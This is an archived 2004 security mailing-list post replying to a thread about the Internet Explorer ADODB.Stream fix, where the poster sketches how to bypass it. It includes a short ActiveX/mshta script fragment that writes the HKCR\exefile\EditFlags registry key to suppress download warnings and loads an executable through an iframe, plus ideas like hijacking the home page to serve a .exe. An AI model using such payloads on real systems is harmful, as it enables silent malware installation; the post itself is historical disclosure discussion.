lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <200407030206.i6326Wq9001731@web124.megawebservers.com>
From: 1 at malware.com (http-equiv@...ite.com)
Subject: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out


 still have to contend with mshta.exe calling out through the 
iframe and more than likely firewalled long ago, so use it to 
write the registry to kill the download warning, then use it set 
the browser home page as http://www..../foo.exe, that or the 
default search engine.

tons of possibilities.

Well done Matthew !

 <!--
 
ActiveXObject("Shell.Application");
obj.ShellExecut("mshta.exe","about:<script>var wsh=new 
ActiveXObject('WScript.Shell');wsh.RegWrite
('HKCR\exefile\EditFlags', 0x38070000, "REG_BINARY");)
</script><iframe src=foo.exe>");

 -->


On quick reflection, I completely missed Matthew's point. It's 
brilliant. If you can indeed kill the download dialog, kill it, 
stick a frame in it and bang. If it doesn't work, use the 
regWrite and re-set the adodb.stream instead, and continue on 
your merry way. 


-- 
http://www.malware.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ